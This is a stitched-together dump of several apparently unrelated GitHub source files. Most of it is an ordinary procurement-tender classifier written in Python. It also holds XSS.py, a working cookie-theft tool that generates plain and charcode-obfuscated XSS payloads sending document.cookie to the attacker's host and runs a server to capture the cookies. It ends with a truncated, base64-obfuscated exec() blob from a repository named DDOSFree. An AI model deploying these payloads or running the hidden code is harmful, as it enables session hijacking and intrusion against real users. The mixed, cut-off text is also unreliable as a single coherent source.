print(scores) print('Avg. CV Score | {} Run {}: {:.2f}'.format(algorithm, runIndex, round(sum(scores)/len(scores), 4))) # Select all attributes x_test = test.drop(['Y'], axis=1) x_train = train.drop(['Y'], axis=1) # Only select the response result attributes y_test = test[['Y']].copy() y_train = train[['Y']] # Create the model # Train the model on training sets classifier = classifier.fit(x_train, y_train['Y']) # print the max_depths of all classifiers in a Random Forest if algorithm == 'random_forest': print('Random Forest Depts:', [self.dt_max_depth(t.tree_) for t in classifier.estimators_]) # Create a file displaying the tree if 'draw_tree' in self.config and self.config['draw_tree'] and algorithm == 'decision_tree' and runIndex == 0: tree.export_graphviz(classifier, out_file='tree.dot', feature_names=x_train.columns) # Predict on the test sets prediction = classifier.predict(x_test) # Add run number to df y_test['run'] = runIndex x_test['run'] = runIndex # add prediction to df y_test['prediction'] = prediction # add result of run to df y_test['correct'] = y_test['prediction'] == y_test['Y'] # add run to run arrays x_tests.append(x_test) y_tests.append(y_test) return x_tests, y_tests def queryData(self): if not hasattr(self, 'positives') or not hasattr(self, 'negatives'): self.positives = self.__runSql(True) self.negatives = self.__runSql(False) logger.info('sql done') return self.positives, self.negatives def __runSql(self, response): resp = '=' if (not response): resp = '!=' query = """SELECT {} from beruecksichtigteanbieter_zuschlag JOIN zuschlag ON zuschlag.meldungsnummer = beruecksichtigteanbieter_zuschlag.meldungsnummer JOIN anbieter ON beruecksichtigteanbieter_zuschlag.anbieter_id = anbieter.anbieter_id JOIN projekt ON zuschlag.projekt_id = projekt.projekt_id JOIN auftraggeber ON projekt.auftraggeber_id = auftraggeber.auftraggeber_id JOIN ausschreibung ON projekt.projekt_id = ausschreibung.projekt_id JOIN cpv_dokument ON cpv_dokument.meldungsnummer = 
ausschreibung.meldungsnummer WHERE anbieter.institution {} "{}" ORDER BY ausschreibung.meldungsnummer; """.format(self.select, resp, self.anbieter) return pd.read_sql(query, engine) def prepareUnfilteredRun(self, positive_sample, negative_samples): merged_samples_for_names = [] for negative_sample in negative_samples: # Merge positive and negative df into one merged_samples_for_names.append(positive_sample.append(negative_sample, ignore_index=True).copy()) return merged_samples_for_names def __getAccuracies(self, dfys): res = pd.DataFrame(columns=['accuracy', 'MCC', 'fn_rate']) for dfy in dfys: acc = round(accuracy_score(dfy.Y, dfy.prediction), 4) # f1 = round(f1_score(dfy.Y, dfy.prediction), 4) mcc = matthews_corrcoef(dfy.Y, dfy.prediction) matrix = confusion_matrix(dfy.Y, dfy.prediction) fnr = round(matrix[1][0] / (matrix[1][1] + matrix[1][0]), 4) # add row to end of df, *100 for better % readability res.loc[len(res)] = [ acc*100, mcc, fnr*100 ] return res def __getConfusionMatices(self, dfys): res = pd.DataFrame(columns=['tn', 'tp', 'fp', 'fn']) for dfy in dfys: # ConfusionMatrix legende: # [tn, fp] # [fn, tp] matrix = confusion_matrix(dfy.Y, dfy.prediction) res.loc[len(res)] = [ matrix[0][0], matrix[1][1], matrix[0][1], matrix[1][0] ] # res.loc['sum'] = res.sum() # Summarize each column return res def __getIterationMetadata(self, df): res = {} res['acc_mean'] = df['accuracy'].mean() res['acc_median'] = df['accuracy'].median() res['acc_min'] = df['accuracy'].min() res['acc_max'] = df['accuracy'].max() res['acc_quantile_25'] = df['accuracy'].quantile(q=.25) res['acc_quantile_75'] = df['accuracy'].quantile(q=.75) res['mcc_mean'] = df['MCC'].mean() res['mcc_median'] = df['MCC'].median() res['mcc_min'] = df['MCC'].min() res['mcc_max'] = df['MCC'].max() res['mcc_quantile_25'] = df['MCC'].quantile(q=.25) res['mcc_quantile_75'] = df['MCC'].quantile(q=.75) res['fn_rate_mean'] = df['fn_rate'].mean() res['fn_rate_median'] = df['fn_rate'].median() res['fn_rate_min'] = 
df['fn_rate'].min() res['fn_rate_max'] = df['fn_rate'].max() res['fn_rate_quantile_25'] = df['fn_rate'].quantile(q=.25) res['fn_rate_quantile_75'] = df['fn_rate'].quantile(q=.75) res['sample_size_mean'] = (df['fp'] + df['fn'] + df['tn'] + df['tp']).mean() return res def __cross_val_score(self, clf, sample, cv): cross_val_scores = [] for validation_run_index in range(cv): train, test = train_test_split(sample, random_state=validation_run_index) # Select all attributes but meldungsnummer xtest = test.drop(['Y'], axis=1) xtrain = train.drop(['Y'], axis=1) # Only select the response result attributes ytest = test[['Y']] ytrain = train[['Y']] clf = clf.fit(xtrain, ytrain['Y']) prediction = clf.predict(xtest) cross_val_scores.append(accuracy_score(ytest, prediction)) return cross_val_scores def prepare_data(self): filter_attributes = ['meldungsnummer'] + self.attributes # filter only specified attributes positives = self.positives[filter_attributes].copy() negatives = self.negatives[filter_attributes].copy() positives['Y'] = 1 negatives['Y'] = 0 merged = positives.append(negatives, ignore_index=True) if hasattr(self, 'cleanData'): positives = self.cleanData(positives, self.attributes) negatives = self.cleanData(negatives, self.attributes) else: # positives = self.preprocess_data(positives, self.attributes) # negatives = self.preprocess_data(negatives, self.attributes) merged, duplicates = self.preprocess_data(merged, self.attributes) positives = merged[merged['Y']==1] negatives = merged[merged['Y']==0] return positives, negatives, duplicates def preprocess_data(self, df, filters): df = df.copy() # drop duplicates before starting to preprocess df = df.drop_duplicates() if 'ausschreibung_cpv' in filters: split = { 'division': lambda x: math.floor(x/1000000), 'group': lambda x: math.floor(x/100000), 'class': lambda x: math.floor(x/10000), 'category': lambda x: math.floor(x/1000) } for key, applyFun in split.items(): df['cpv_' + key ] = 
df['ausschreibung_cpv'].apply(applyFun) tmpdf = {} for key in split.keys(): key = 'cpv_' + key tmpdf[key] = df[['meldungsnummer']].join(pd.get_dummies(df[key], prefix=key)).groupby('meldungsnummer').max() encoded_df = pd.concat([tmpdf['cpv_'+ key] for key in split.keys()], axis=1) df = df.drop(['cpv_' + key for key, fun in split.items()], axis=1) df = df.drop(['ausschreibung_cpv'], axis=1) df = df.drop_duplicates() df = df.join(encoded_df, on='meldungsnummer') if 'gatt_wto' in filters: df[['gatt_wto']] = df[['gatt_wto']].applymap(ModelTrainer.unifyYesNo) if 'anzahl_angebote' in filters: df[['anzahl_angebote']] = df[['anzahl_angebote']].applymap(ModelTrainer.tonumeric) if 'teilangebote' in filters: df[['teilangebote']] = df[['teilangebote']].applymap(ModelTrainer.unifyYesNo) if 'lose' in filters: df[['lose']] = df[['lose']].applymap(ModelTrainer.unifyYesNoOrInt) if 'varianten' in filters: df[['varianten']] = df[['varianten']].applymap(ModelTrainer.unifyYesNo) if 'auftragsart_art' in filters: auftrags_art_df = pd.get_dummies(df['auftragsart_art'], prefix='aftrgsrt', dummy_na=True) df = pd.concat([df,auftrags_art_df],axis=1).drop(['auftragsart_art'], axis=1) if 'sprache' in filters: sprache_df = pd.get_dummies(df['sprache'], prefix='lang', dummy_na=True) df = pd.concat([df,sprache_df],axis=1).drop(['sprache'], axis=1) if 'auftragsart' in filters: auftragsart_df = pd.get_dummies(df['auftragsart'], prefix='auftr', dummy_na=True) df = pd.concat([df,auftragsart_df],axis=1).drop(['auftragsart'], axis=1) if 'beschaffungsstelle_plz' in filters: # plz_df = pd.get_dummies(df['beschaffungsstelle_plz'], prefix='beschaffung_plz', dummy_na=True) # df = pd.concat([df,plz_df],axis=1).drop(['beschaffungsstelle_plz'], axis=1) df['beschaffungsstelle_plz'] = df['beschaffungsstelle_plz'].apply(ModelTrainer.transformToSingleInt) split = { 'district': lambda x: math.floor(x/1000) if not math.isnan(x) else x, 'area': lambda x: math.floor(x/100) if not math.isnan(x) else x, } prefix = 
'b_plz_' for key, applyFun in split.items(): df[prefix + key] = df['beschaffungsstelle_plz'].apply(applyFun) df.rename(columns={'beschaffungsstelle_plz': prefix + 'ganz'}, inplace=True) for key in ['ganz'] + list(split.keys()): key = prefix + key df = pd.concat([df, pd.get_dummies(df[key], prefix=key, dummy_na=True)], axis=1).drop(key, axis=1) df.drop_duplicates(inplace=True) if any(df.duplicated(['meldungsnummer'])): logger.warning("duplicated meldungsnummer") duplicates = df[df.duplicated(['meldungsnummer'])] df = df.drop(['meldungsnummer'], axis=1) return df, duplicates def dt_max_depth(self, tree): n_nodes = tree.node_count children_left = tree.children_left children_right = tree.children_right def walk(node_id): if (children_left[node_id] != children_right[node_id]): left_max = 1 + walk(children_left[node_id]) right_max = 1 + walk(children_right[node_id]) return max(left_max, right_max) else: # is leaf return 1 root_node_id = 0 return walk(root_node_id) # @param val: a value to be casted to numeric # @return a value that has been casted to an integer. Returns 0 if cast was not possible def tonumeric(val): try: return int(val) except: return 0 # @param val: a string value to be categorised # @return uniffied gatt_wto resulting in either "Yes", "No" or "?" @staticmethod def unifyYesNo(val): switcher = { 'Ja': 1, 'Sì': 1, 'Oui': 1, 'YES': 1, 'Nein': 0, 'Nei': 0, 'Non': 0, 'NO': 0, } return switcher.get(val, 0) @staticmethod def unifyYesNoOrInt(val): try: return int(val) except ValueError: return ModelTrainer.unifyYesNo(val) @staticmethod def transformToSingleInt(plz): try: result = int(plz) except ValueError: try: result = int(re.search(r"\d{4}", plz).group()) except AttributeError: return np.nan return result if result >= 1000 and result <= 9999 else np.nan
Python
426
39.953053
134
/learn.py
0.57549
0.567695
digital-sustainability/swiss-procurement-classifier
refs/heads/master
from db import connection, engine import math import pandas as pd import numpy as np from sklearn import tree from sklearn.model_selection import train_test_split from sklearn.metrics import confusion_matrix, accuracy_score, roc_curve, auc # ===================== # SQL SELECT STATEMENTS # ===================== # @param select: SELECT argument formatted as string # @return a Pandas dataframe from the full Simap datanbase depending on the SQL SELECT Query def getFromSimap(select): query = """SELECT {} from (((((beruecksichtigteanbieter_zuschlag INNER JOIN zuschlag ON zuschlag.meldungsnummer = beruecksichtigteanbieter_zuschlag.meldungsnummer) INNER JOIN anbieter ON beruecksichtigteanbieter_zuschlag.anbieter_id = anbieter.anbieter_id) INNER JOIN projekt ON zuschlag.projekt_id = projekt.projekt_id) INNER JOIN auftraggeber ON projekt.auftraggeber_id = auftraggeber.auftraggeber_id) INNER JOIN ausschreibung ON projekt.projekt_id = ausschreibung.projekt_id INNER JOIN cpv_dokument ON cpv_dokument.meldungsnummer = zuschlag.meldungsnummer) INNER JOIN cpv ON cpv_dokument.cpv_nummer = cpv.cpv_nummer; """.format(select) return pd.read_sql(query, connection); # @param bidder: anbieter.institution name formatted as string # @return a Pandas dataframe showing the most important CPV codes per bidder. 
(Zuschläge pro CPV Code) def getCpvCount(bidder): query = """SELECT cpv.cpv_nummer, cpv.cpv_deutsch, COUNT(cpv_dokument.cpv_nummer) FROM cpv, cpv_dokument, zuschlag, beruecksichtigteanbieter_zuschlag, anbieter WHERE cpv.cpv_nummer = cpv_dokument.cpv_nummer AND cpv_dokument.meldungsnummer = zuschlag.meldungsnummer AND zuschlag.meldungsnummer = beruecksichtigteanbieter_zuschlag.meldungsnummer AND beruecksichtigteanbieter_zuschlag.anbieter_id = anbieter.anbieter_id AND anbieter.institution = "{}" GROUP BY cpv_nummer ORDER BY COUNT(cpv_dokument.cpv_nummer) DESC; """.format(bidder) return pd.read_sql(query, connection); # @param bidder: anbieter.institution formatted as string of which you want to see the CPV code diversity # @return a Pandas Dataframe that contains a the diversity of CPV codes per bidder def getCpvDiversity(bidder): query = """SELECT anbieter.institution, COUNT(beruecksichtigteanbieter_zuschlag.anbieter_id) AS "Anzahl Zuschläge", COUNT(DISTINCT cpv_dokument.cpv_nummer) AS "Anzahl einzigartige CPV-Codes", SUM(IF(beruecksichtigteanbieter_zuschlag.preis_summieren = 1,beruecksichtigteanbieter_zuschlag.preis,0)) AS "Ungefähres Zuschlagsvolumen", MIN(zuschlag.datum_publikation) AS "Von", MAX(zuschlag.datum_publikation) AS "Bis" FROM cpv, cpv_dokument, zuschlag, beruecksichtigteanbieter_zuschlag, anbieter WHERE cpv.cpv_nummer = cpv_dokument.cpv_nummer AND cpv_dokument.meldungsnummer = zuschlag.meldungsnummer AND zuschlag.meldungsnummer = beruecksichtigteanbieter_zuschlag.meldungsnummer AND beruecksichtigteanbieter_zuschlag.anbieter_id = anbieter.anbieter_id AND anbieter.institution="{}" GROUP BY anbieter.institution ORDER BY `Anzahl einzigartige CPV-Codes` DESC """.format(bidder) return pd.read_sql(query, connection); # @param select_anbieter: SQL SELECT for the bidder side. 
Backup: ''' select_an = ( "anbieter.anbieter_id, " "anbieter.anbieter_plz, " "anbieter.institution as anbieter_insitution, " "cpv_dokument.cpv_nummer as anbieter_cpv, " "ausschreibung.meldungsnummer" ) ''' # @param select_aus: SQL SELECT for the open tenders. Backup: ''' select_aus = ( "anbieter.anbieter_id, " "auftraggeber.institution as beschaffungsstelle_institution, " "auftraggeber.beschaffungsstelle_plz, " "ausschreibung.gatt_wto, " "cpv_dokument.cpv_nummer as ausschreibung_cpv, " "ausschreibung.meldungsnummer" ) ''' # @param bidder: the bidder formatted as string you or do not want the corresponding responses from # @param response: True if you want all the tenders of the bidder or False if you do not want any (the negative response) # @return a dataframe containing negative or positive bidding cases of a chosen bidder def getResponses(select_anbieter, select_ausschreibung, bidder, response): resp = '='; if (not response): resp = '!=' query = """SELECT * FROM (SELECT {} from ((((((beruecksichtigteanbieter_zuschlag INNER JOIN zuschlag ON zuschlag.meldungsnummer = beruecksichtigteanbieter_zuschlag.meldungsnummer) INNER JOIN anbieter ON beruecksichtigteanbieter_zuschlag.anbieter_id = anbieter.anbieter_id) INNER JOIN projekt ON zuschlag.projekt_id = projekt.projekt_id) INNER JOIN auftraggeber ON projekt.auftraggeber_id = auftraggeber.auftraggeber_id) INNER JOIN ausschreibung ON projekt.projekt_id = ausschreibung.projekt_id) INNER JOIN cpv_dokument ON cpv_dokument.meldungsnummer = zuschlag.meldungsnummer) WHERE anbieter.institution {} "{}" ) anbieter JOIN (SELECT {} from ((((((beruecksichtigteanbieter_zuschlag INNER JOIN zuschlag ON zuschlag.meldungsnummer = beruecksichtigteanbieter_zuschlag.meldungsnummer) INNER JOIN anbieter ON beruecksichtigteanbieter_zuschlag.anbieter_id = anbieter.anbieter_id) INNER JOIN projekt ON zuschlag.projekt_id = projekt.projekt_id) INNER JOIN auftraggeber ON projekt.auftraggeber_id = auftraggeber.auftraggeber_id) INNER JOIN 
ausschreibung ON projekt.projekt_id = ausschreibung.projekt_id) INNER JOIN cpv_dokument ON cpv_dokument.meldungsnummer = ausschreibung.meldungsnummer) WHERE anbieter.institution {} "{}" ) ausschreibung ON ausschreibung.meldungsnummer2 = anbieter.meldungsnummer ORDER BY ausschreibung.meldungsnummer2; """.format(select_anbieter, resp, bidder, select_ausschreibung, resp, bidder) return pd.read_sql(query, connection); # @return def getCpvRegister(): return pd.read_sql("SELECT * FROM cpv", connection); # @param select_an # @param select_aus # @param anbieter # @return def createAnbieterDf(select_an, select_aus, anbieter): # Create a new DFs one containing all positiv, one all the negative responses data_pos = getResponses(select_an, select_aus, anbieter, True) data_neg = getResponses(select_an, select_aus, anbieter, False) return data_pos.copy(), data_neg.copy() # ======================== # MODEL CREATION FUNCTIONS # ======================== # @param df_pos_full # @param df_neg_full # @param negSampleSize # @return def decisionTreeRun(df_pos_full, df_neg_full , neg_sample_size): df_pos = df_pos_full # Create a random DF subset ussed to train the model on df_neg = df_neg_full.sample(neg_sample_size) # Assign pos/neg lables to both DFs df_pos['Y']=1 df_neg['Y']=0 # Merge the DFs into one df_appended = df_pos.append(df_neg, ignore_index=True) # Clean PLZ property df_appended[['anbieter_plz']] = df_appended[['anbieter_plz']].applymap(tonumeric) df_appended[['beschaffungsstelle_plz']] = df_appended[['beschaffungsstelle_plz']].applymap(tonumeric) # Shuffle the df df_tree = df_appended.sample(frac=1) # Put responses in one arry and all diesired properties in another y = df_tree.iloc[:,[11]] x = df_tree.iloc[:,[1,3,7,9]] # create sets xtrain, xtest, ytrain, ytest = train_test_split(x, y, test_size=0.25) # train the model on training sets clf = tree.DecisionTreeClassifier() clf = clf.fit(xtrain, ytrain) # predict on the test sets res = clf.predict(xtest) ytest["res"]= res 
ytest['richtig'] = ytest['res']==ytest['Y'] tp = ytest[(ytest['Y']==1) & (ytest['res']==1)] tn = ytest[(ytest['Y']==0) & (ytest['res']==0)] fp = ytest[(ytest['Y']==0) & (ytest['res']==1)] fn = ytest[(ytest['Y']==1) & (ytest['res']==0)] return len(df_pos.index) / neg_sample_size, accuracy_score(ytest.Y, res), confusion_matrix(ytest.Y, res); # @param full_neg: dataframe containing all negative responses for that bidder # @param df_pos_size: amount of data in the positive dataframe # @param amount_neg_def: how many response_negative dataframes the function will produce # @param pos_neg_ratio: what the ratio of positive to negative responses will be # @return a list of negative response dataframes, each considered for one run def createNegativeResponses(full_neg, pos_df_size, amount_neg_df, pos_neg_ratio): all_negatives = []; sample_size = math.ceil(pos_df_size * (pos_neg_ratio + 1)); for count in range(amount_neg_df): all_negatives.append(full_neg.sample(sample_size, random_state=count)); return all_negatives; # ======================= # DATA CLEANING FUNCTIONS # ======================= # @param val: a value to be casted to numeric # @return a value that has been casted to an integer. Returns 0 if cast was not possible def tonumeric(val): try: return int(val) except: return 0 # @param val: a string value to be categorised # @return uniffied gatt_wto resulting in either "Yes", "No" or "?" 
def unifyYesNo(val): switcher = { 'Ja': 1, 'Sì': 1, 'Oui': 1, 'Nein': 0, 'Nei': 0, 'Non': 0, } return switcher.get(val, 0) # TODO: Kategorien mit Matthias absprechen # @param v: the price of a procurement # @return map prices to 16 categories def createPriceCategory(val): try: val = int(val) except: val = -1 if val == 0: return 0 if 0 < val <= 100000: return 1 if 100000 < val <= 250000: return 2 if 250000 < val <= 500000: return 3 if 500000 < val <= 750000: return 4 if 750000 < val <= 1000000: return 5 if 1000000 < val <= 2500000: return 6 if 2500000 < val <= 5000000: return 7 if 5000000 < val <= 10000000: return 8 if 10000000 < val <= 25000000: return 9 if 25000000 < val <= 50000000: return 10 if 50000000 < val <= 100000000: return 11 if 100000000 < val <= 200000000: return 12 if 200000000 < val <= 500000000: return 13 if val > 500000000: return 14 else: return -1
Python
246
41.13821
124
/helpers.py
0.682511
0.658214
digital-sustainability/swiss-procurement-classifier
refs/heads/master
import json import pandas as pd import warnings class Collection(): algorithms = ['gradient_boost', 'decision_tree', 'random_forest'] def __init__(self): self.list = [] def append(self, item): self.list.append(item) def __iter__(self): return iter(self.list) def get_all_as_df(self, algorithm): try: tmp = [] for iteration in self.list: tmp.append(iteration[algorithm]['metadata']) return pd.DataFrame(tmp, index=[iteration['anbieter'] for iteration in self.list]) except: warnings.warn('Select an algorithm: "random_forest", "gradient_boost" or "decision_tree"') def df_row_per_algorithm(self): tmp = [] for iteration in self.list: for algorithm in self.algorithms: output = iteration[algorithm]['metadata'] evaluation_dataframe = pd.DataFrame.from_dict(iteration[algorithm]['data']) # missing metrics output['acc_std'] = evaluation_dataframe['accuracy'].std() evaluation_dataframe['MCC'] = evaluation_dataframe['MCC']*100 output['mcc_std'] = evaluation_dataframe['MCC'].std() output['fn_std'] = evaluation_dataframe['fn_rate'].std() output['anbieter'] = iteration['anbieter'] output['label'] = iteration['label'] output['algorithm'] = algorithm output['attributes'] = ",".join(iteration['attributes']) tmp.append(output) return pd.DataFrame(tmp) def to_json(self, **kwargs): return json.dumps(self.list, **kwargs) def to_file(self, filename): with open(filename, 'w') as fp: json.dump(self.list, fp, indent=4, sort_keys=True) def import_file(self, filename, force=False): if len(self.list) and not force: warnings.warn("Loaded Collection, pls add force=True") else: with open(filename, 'r') as fp: self.list = json.load(fp)
Python
59
34.423729
102
/collection.py
0.567464
0.56555
digital-sustainability/swiss-procurement-classifier
refs/heads/master
import configparser import sqlalchemy # git update-index --skip-worktree config.ini config = configparser.ConfigParser() config.read("config.ini") connection_string = 'mysql+' + config['database']['connector'] + '://' + config['database']['user'] + ':' + config['database']['password'] + '@' + config['database']['host'] + '/' + config['database']['database'] if __name__ == "__main__": for item, element in config['database'].items(): print('%s: %s' % (item, element)) print(connection_string) else: engine = sqlalchemy.create_engine(connection_string) connection = engine.connect()
Python
20
29.75
212
/db.py
0.645528
0.645528
digital-sustainability/swiss-procurement-classifier
refs/heads/master
from learn import ModelTrainer from collection import Collection import pandas as pd import logging import traceback import os logging.basicConfig() logger = logging.getLogger(__name__) logger.setLevel(logging.INFO) # === THESIS === anbieter_config = { 'Construction': [ 'Alpiq AG', 'KIBAG', 'Egli AG', ], 'IT': [ 'Swisscom', 'ELCA Informatik AG', 'Unisys', ], 'Other': [ 'Kummler + Matter AG', 'Thermo Fisher Scientific (Schweiz) AG', 'AXA Versicherung AG', ], 'Diverse': [ 'Siemens AG', 'ABB', 'Basler & Hofmann West AG', ] } # === TESTING === #anbieter = 'Marti AG' #456 #anbieter = 'Axpo AG' #40 #anbieter = 'Hewlett-Packard' #90 #anbieter = 'BG Ingénieurs Conseils' SA #116 #anbieter = 'Pricewaterhousecoopers' #42 #anbieter = 'Helbling Beratung + Bauplanung AG' #20 #anbieter = 'Ofrex SA' #52 #anbieter = 'PENTAG Informatik AG' #10 #anbieter = 'Wicki Forst AG' #12 #anbieter = 'T-Systems Schweiz' #18 #anbieter = 'Bafilco AG' #20 #anbieter = '4Video-Production GmbH' #3 #anbieter = 'Widmer Ingenieure AG' #6 #anbieter = 'hmb partners AG' #2 #anbieter = 'Planmeca' #4 #anbieter = 'K & M Installationen AG' #4 select = ( "ausschreibung.meldungsnummer, " "anbieter.institution as anbieter_institution, " "auftraggeber.beschaffungsstelle_plz, " "ausschreibung.gatt_wto, " "ausschreibung.sprache, " "ausschreibung.auftragsart, " "ausschreibung.auftragsart_art, " "ausschreibung.lose, " "ausschreibung.teilangebote, " "ausschreibung.varianten, " "ausschreibung.bietergemeinschaft, " "cpv_dokument.cpv_nummer as ausschreibung_cpv" ) attributes = ['ausschreibung_cpv', 'auftragsart_art', 'beschaffungsstelle_plz', 'auftragsart', 'gatt_wto','lose','teilangebote', 'varianten','sprache'] #attributes = ['auftragsart_art', 'beschaffungsstelle_plz', 'auftragsart', 'ausschreibung_cpv', 'gatt_wto','teilangebote', 'sprache'] #attributes = ['ausschreibung_cpv', 'auftragsart_art', 'beschaffungsstelle_plz', 'auftragsart', 'gatt_wto','lose','teilangebote', 'varianten','sprache'] # attributes = [ # [ 
'ausschreibung_cpv', 'auftragsart_art' ], # [ 'ausschreibung_cpv', 'beschaffungsstelle_plz' ], # [ 'ausschreibung_cpv', 'auftragsart' ], # [ 'ausschreibung_cpv', 'gatt_wto' ], # [ 'ausschreibung_cpv', 'lose' ], # [ 'ausschreibung_cpv', 'teilangebote' ], # [ 'ausschreibung_cpv', 'varianten' ], # [ 'ausschreibung_cpv', 'sprache' ] # ] config = { # ratio that the positive and negative responses have to each other 'positive_to_negative_ratio': 0.5, # Percentage of training set that is used for testing (Recommendation of at least 25%) 'test_size': 0.25, 'runs': 100, #'enabled_algorithms': ['random_forest'], 'enabled_algorithms': ['random_forest', 'decision_tree', 'gradient_boost'], 'random_forest': { # Tune Random Forest Parameter 'n_estimators': 100, 'max_features': 'sqrt', 'max_depth': None, 'min_samples_split': 4 }, 'decision_tree': { 'max_depth': 30, 'max_features': 'sqrt', 'min_samples_split': 4 }, 'gradient_boost': { 'n_estimators': 100, 'learning_rate': 0.1, 'max_depth': 30, 'min_samples_split': 4, 'max_features': 'sqrt' } } class IterationRunner(): def __init__(self, anbieter_config, select, attributes, config): self.anbieter_config = anbieter_config self.select = select self.attributes = attributes self.config = config self.trainer = ModelTrainer(select, '', config, attributes) self.collection = Collection() def run(self): for label, anbieters in self.anbieter_config.items(): logger.info(label) for anbieter in anbieters: for attr_id in range(len(self.attributes)): att_list = self.attributes[:attr_id+1] self.singleRun(anbieter, att_list, label) self.trainer.resetSQLData() def runAttributesEachOne(self): for label, anbieters in self.anbieter_config.items(): logger.info(label) for anbieter in anbieters: for attr in self.attributes: att_list = [attr] self.singleRun(anbieter, att_list, label) self.trainer.resetSQLData() def runAttributesList(self): for label, anbieters in self.anbieter_config.items(): logger.info(label) for anbieter in anbieters: for att_list in 
self.attributes: self.singleRun(anbieter, att_list, label) self.trainer.resetSQLData() def runSimpleAttributeList(self): for label, anbieters in self.anbieter_config.items(): logger.info(label) for anbieter in anbieters: self.singleRun(anbieter, self.attributes, label) self.trainer.resetSQLData() def singleRun(self, anbieter, att_list, label): logger.info('label: {}, anbieter: {}, attributes: {}'.format(label, anbieter, att_list)) try: self.trainer.attributes = att_list self.trainer.anbieter = anbieter output = self.trainer.run() output['label'] = label self.collection.append(output) filename = os.getenv('DB_FILE', 'dbs/auto.json') self.collection.to_file(filename) except Exception as e: traceback.print_exc() print(e) print('one it done') runner = IterationRunner(anbieter_config, select, attributes, config) if __name__ == '__main__': # runner.collection.import_file('dbs/auto.json') runner.run() runner.runAttributesEachOne() runner.runAttributesList() # label, anbieters = next(iter(runner.anbieter_config.items())) # print(label)
Python
185
31.459459
152
/runIterations.py
0.604996
0.59567
RomaGeyXD/XSS
refs/heads/main
#!/usr/bin/python3 import argparse import os from http.server import HTTPServer, BaseHTTPRequestHandler from urllib.parse import parse_qs from requests import * ip = get('https://api.ipify.org').text parser = argparse.ArgumentParser(description='creates xss payloads and starts http server to capture responses and collect cookies', epilog='xssthief --error 10.10.10.50' + '\n' + 'xssthief --image 10.10.10.50' + '\n' + 'xssthief --obfuscated 10.10.10.50', formatter_class=argparse.RawTextHelpFormatter) parser.add_argument('lhost', help='ip address of listening host') parser.add_argument('-e', '--error', action='store_true', help='create error payload') parser.add_argument('-i', '--image', action='store_true', help='create image payload') parser.add_argument('-o', '--obfuscated', action='store_true', help='create obfuscated payload') args = parser.parse_args() lhost = ip class handler(BaseHTTPRequestHandler): def do_GET(self): qs = {} path = self.path if '?' in path: path, temp = path.split('?', 1) qs = parse_qs(temp) print(qs) def serve(): print('Starting server, press Ctrl+C to exit...\n') address = (lhost, 80) httpd = HTTPServer(address, handler) try: httpd.serve_forever() except KeyboardInterrupt: httpd.server_close() print('\nBye!') def obfuscate(): js = '''document.write('<img src=x onerror=this.src="http://''' + lhost + '''/?cookie="+encodeURI(document.getElementsByName("cookie")[0].value)>');''' ords = ','.join([str(ord(c)) for c in js]) payload = '<img src="/><script>eval(String.fromCharCode(' + ords + '))</script>" />' return payload def err_payload(): xss = '''<img src=x onerror=this.src='http://''' + lhost + '''/?cookie='+document.cookie>''' print('[*] Your payload: ' + xss + '\n') serve() def img_payload(): xss = '''<new Image().src='http://''' + lhost + '''/?cookie='+document.cookie>''' print('[*] Your payload: ' + xss + '\n') serve() def obs_payload(): xss = obfuscate() print('[*] Your payload: ' + xss + '\n') serve() def main(): if args.obfuscated: 
obs_payload() elif args.error: err_payload() elif args.image: img_payload() else: parser.print_help() main()
Python
69
33.724636
303
/XSS.py
0.581744
0.56998
TAI-REx/DDOSFree
refs/heads/main
#-------------------------------------------------# # Obfuscate By Mr.GamingThanks To Black Coder Crush # github : https://github.com/clayhacker-max # from Linux # localhost : aarch64 # key : Asep-fA6bC2eA6tB8lX8 # date : Fri Jul 16 13:54:16 2021 #-------------------------------------------------# #Compile By DNMODZ #My Team : Black Coder Crush import base64 exec(base64.b64decode("#Compile By DNMODZ
#My Team : Black Coder Crush
import base64
exec(base64.b64decode("I0NvbXBpbGUgQnkgRE5NT0RaCiNNeSBUZWFtIDogQmxhY2sgQ29kZXIgQ3J1c2gKaW1wb3J0IGJhc2U2NApleGVjKGJhc2U2NC5iNjRkZWNvZGUoIkkwTnZiWEJwYkdVZ1Fua2dSRTVOVDBSYUNpTk5lU0JVWldGdElEb2dRbXhoWTJzZ1EyOWtaWElnUTNKMWMyZ0thVzF3YjNKMElHSmhjMlUyTkFwbGVHVmpLR0poYzJVMk5DNWlOalJrWldOdlpHVW9Ja2t3VG5aaVdFSndZa2RWWjFGdWEyZFNSVFZPVkRCU1lVTnBUazVsVTBKVldsZEdkRWxFYjJkUmJYaG9XVEp6WjFFeU9XdGFXRWxuVVROS01XTXlaMHRoVnpGM1lqTktNRWxIU21oak1sVXlUa0Z3YkdWSFZtcExSMHBvWXpKVk1rNUROV2xPYWxKcldsZE9kbHBIVlc5SmEydDNWRzVhYVZkRlNuZFphMlJXV2pGR2RXRXlaRk5TVkZaUFZrUkNVMWxWVG5CVWF6VnNWVEJLVmxkc1pFZGtSV3hGWWpKa1VtSllhRzlYVkVwNldqRkZlVTlYZEdGWFJXeHVWVlJPUzAxWFRYbGFNSFJvVm5wR00xbHFUa3ROUld4SVUyMW9hazFzVlhsVWEwWjNZa2RXU0ZadGNFeFNNSEJ2V1hwS1ZrMXJOVVJPVjJ4UFlXeEtjbGRzWkU5a2JIQklWbGM1U21FeWRETldSelZoWVZaa1JsTnVaRnBoTWxKWFYycEdSMlJYUlhsYVJrNVRWa1phVUZaclVrTlZNV3hXVkc1Q1ZXRjZWbk5XVkVKTFZteGtjMXBGWkd0U1YzaEdXV3BLYTFWdFNsbGhSemxZVmtWd05sZHFSa1psVlRsWVpFZEdXRkpYZUhWV1ZsSlBVekF4V0ZSWWJHRk5TRkp2Vm01d1IwMHhiSEZVYTNST1VsZDRTVlV5TVc5aGF6RnpWbGhzVldFd1dqTlphMlJYVTBaYWRHTkZlRk5OU0VKMlYxaHdTMVpyTVhKT1ZWSlBWako0VUZsWGVFdGpiR1J6V2tVNWEySklRa2xXYkdNMVUyMUtWbGRzYkZWV2JXaHlXVlpWZDJReVNYcGFSbEpYVmpKb1VWWkhlR3RVTURCM1RWVmFhMUl5YUZoYVYzUmFaV3hrV0dORk9WUk5SRVpIV1d0V2IxVkdaRWxSYTFwWFZtMW9SRnBFUm5Oak1rWkdWRzEwYVZaVVZYaFdiRnByWVRKRmVGTlliR3hTUlVwWldXdFdWMDB4VmpaVGEyUllVbFJHV2xkclpITlVhekZJVDFST1ZrMVdXblpXUkVwVFl6SkZlbUpIZEZOTk1taDVWbFphVTFFeFVrZGlSbVJhVFRKb2NsUlhkSE5PYkZWNVkwVk9WR0pGTlVkWk1HTTFWMjFLVlZKc